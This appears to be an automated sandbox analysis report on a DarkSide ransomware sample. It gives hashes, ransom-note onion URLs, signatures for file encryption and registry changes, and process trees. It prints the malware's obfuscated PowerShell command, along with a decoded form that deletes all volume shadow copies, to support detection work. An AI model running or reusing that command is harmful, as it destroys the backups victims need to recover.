Analysis
- max time kernel: 30s
- max time network: 33s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 05-06-2023 09:25
- Static task: static1
- Behavioral task: behavioral1
- Sample: Darkside.exe
- Resource: win10v2004-20230220-en
General
- Target: Darkside.exe
- Size: 59KB
- MD5: cfcfb68901ffe513e9f0d76b17d02f96
- SHA1: 766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
- SHA256: 17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
- SHA512: 0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
- SSDEEP: 768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5
Malware Config
Extracted from: C:\Users\README.0862cbd2.TXT
- Family: darkside
- URLs:
  http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF
  http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH
Signatures
- DarkSide
  Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
- Renames multiple (162) files with added filename extension
  This suggests ransomware activity of encrypting all the files on the system.
- Modifies extensions of user files (20 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: Darkside.exe
  description | ioc | process
  File renamed | C:\Users\Admin\Pictures\CopySuspend.tiff => C:\Users\Admin\Pictures\CopySuspend.tiff.0862cbd2 | Darkside.exe
  File renamed | C:\Users\Admin\Pictures\MergeSubmit.tiff => C:\Users\Admin\Pictures\MergeSubmit.tiff.0862cbd2 | Darkside.exe
  File opened for modification | C:\Users\Admin\Pictures\MergeSubmit.tiff.0862cbd2 | Darkside.exe
  File renamed | C:\Users\Admin\Pictures\SkipResolve.tiff => C:\Users\Admin\Pictures\SkipResolve.tiff.0862cbd2 | Darkside.exe
  File opened for modification | C:\Users\Admin\Pictures\UninstallOut.tiff | Darkside.exe
  File renamed | C:\Users\Admin\Pictures\WriteRedo.png => C:\Users\Admin\Pictures\WriteRedo.png.0862cbd2 | Darkside.exe
  File renamed | C:\Users\Admin\Pictures\CopyReset.tif => C:\Users\Admin\Pictures\CopyReset.tif.0862cbd2 | Darkside.exe
  File opened for modification | C:\Users\Admin\Pictures\CopyReset.tif.0862cbd2 | Darkside.exe
  File opened for modification | C:\Users\Admin\Pictures\MergeSubmit.tiff | Darkside.exe
  File opened for modification | C:\Users\Admin\Pictures\CopySuspend.tiff | Darkside.exe
  File opened for modification | C:\Users\Admin\Pictures\CopySuspend.tiff.0862cbd2 | Darkside.exe
  File renamed | C:\Users\Admin\Pictures\UninstallOut.tiff => C:\Users\Admin\Pictures\UninstallOut.tiff.0862cbd2 | Darkside.exe
  File opened for modification | C:\Users\Admin\Pictures\WriteRedo.png.0862cbd2 | Darkside.exe
  File opened for modification | C:\Users\Admin\Pictures\SkipResolve.tiff | Darkside.exe
  File opened for modification | C:\Users\Admin\Pictures\SkipResolve.tiff.0862cbd2 | Darkside.exe
  File renamed | C:\Users\Admin\Pictures\SaveSkip.png => C:\Users\Admin\Pictures\SaveSkip.png.0862cbd2 | Darkside.exe
  File opened for modification | C:\Users\Admin\Pictures\SaveSkip.png.0862cbd2 | Darkside.exe
  File opened for modification | C:\Users\Admin\Pictures\UninstallOut.tiff.0862cbd2 | Darkside.exe
  File renamed | C:\Users\Admin\Pictures\ConnectRevoke.png => C:\Users\Admin\Pictures\ConnectRevoke.png.0862cbd2 | Darkside.exe
  File opened for modification | C:\Users\Admin\Pictures\ConnectRevoke.png.0862cbd2 | Darkside.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  Processes: Darkside.exe
  pid | process
  452 | Darkside.exe
- Modifies registry class (5 IoCs)
  Processes: Darkside.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\0862cbd2\DefaultIcon | Darkside.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\0862cbd2 | Darkside.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\0862cbd2\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\0862cbd2.ico" | Darkside.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.0862cbd2 | Darkside.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.0862cbd2\ = "0862cbd2" | Darkside.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: powershell.exe, Darkside.exe
  pid | process
  5080 | powershell.exe
  5080 | powershell.exe
  452 | Darkside.exe
  452 | Darkside.exe
- Suspicious use of AdjustPrivilegeToken (25 IoCs)
  Processes: Darkside.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeIncreaseQuotaPrivilege | 452 | Darkside.exe
  Token: SeSecurityPrivilege | 452 | Darkside.exe
  Token: SeTakeOwnershipPrivilege | 452 | Darkside.exe
  Token: SeLoadDriverPrivilege | 452 | Darkside.exe
  Token: SeSystemProfilePrivilege | 452 | Darkside.exe
  Token: SeSystemtimePrivilege | 452 | Darkside.exe
  Token: SeProfSingleProcessPrivilege | 452 | Darkside.exe
  Token: SeIncBasePriorityPrivilege | 452 | Darkside.exe
  Token: SeCreatePagefilePrivilege | 452 | Darkside.exe
  Token: SeBackupPrivilege | 452 | Darkside.exe
  Token: SeRestorePrivilege | 452 | Darkside.exe
  Token: SeShutdownPrivilege | 452 | Darkside.exe
  Token: SeDebugPrivilege | 452 | Darkside.exe
  Token: SeSystemEnvironmentPrivilege | 452 | Darkside.exe
  Token: SeRemoteShutdownPrivilege | 452 | Darkside.exe
  Token: SeUndockPrivilege | 452 | Darkside.exe
  Token: SeManageVolumePrivilege | 452 | Darkside.exe
  Token: 33 | 452 | Darkside.exe
  Token: 34 | 452 | Darkside.exe
  Token: 35 | 452 | Darkside.exe
  Token: 36 | 452 | Darkside.exe
  Token: SeDebugPrivilege | 5080 | powershell.exe
  Token: SeBackupPrivilege | 4764 | vssvc.exe
  Token: SeRestorePrivilege | 4764 | vssvc.exe
  Token: SeAuditPrivilege | 4764 | vssvc.exe
- Suspicious use of WriteProcessMemory (2 IoCs)
  Processes: Darkside.exe
  description | pid | process | target process
  PID 452 wrote to memory of 5080 | 452 | Darkside.exe | powershell.exe
  PID 452 wrote to memory of 5080 | 452 | Darkside.exe | powershell.exe
- Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
- Process: C:\Users\Admin\AppData\Local\Temp\Darkside.exe (tree depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Darkside.exe"
  Signatures:
  - Modifies extensions of user files
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  Child process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2)
  Command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
  Analyst note: the hex string above decodes byte-for-byte to the PowerShell one-liner "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}", which enumerates and deletes every volume shadow copy on the host. This matches the "Uses Volume Shadow Copy service COM API" signature and the vssvc.exe activity recorded below; the execution-policy bypass (-ep bypass) and hex-decode-then-iex pattern are the detection points to alert on.
  Signatures:
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- Process: C:\Windows\system32\vssvc.exe (tree depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 556084f2c6d459c116a69d6fedcc4105
  SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
  SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
  SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 2247453c28acd1eb75cfe181540458a8
  SHA1: 851fc5a9950d422d76163fdc6a453d6859d56660
  SHA256: 358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd
  SHA512: 42475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qbzciyq0.04b.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Users\README.0862cbd2.TXT
  Filesize: 3KB
  MD5: b58e2411168bbdbec635cf4001635db0
  SHA1: c130cd9caaaa514a6b98c1168e10d44a989d191a
  SHA256: 652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a
  SHA512: 87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a
- memory/5080-137-0x0000023B2FA40000-0x0000023B2FA62000-memory.dmp
  Filesize: 136KB
- memory/5080-147-0x0000023B47CA0000-0x0000023B47CB0000-memory.dmp
  Filesize: 64KB
- memory/5080-148-0x0000023B47CA0000-0x0000023B47CB0000-memory.dmp
  Filesize: 64KB
- memory/5080-149-0x0000023B47CA0000-0x0000023B47CB0000-memory.dmp
  Filesize: 64KB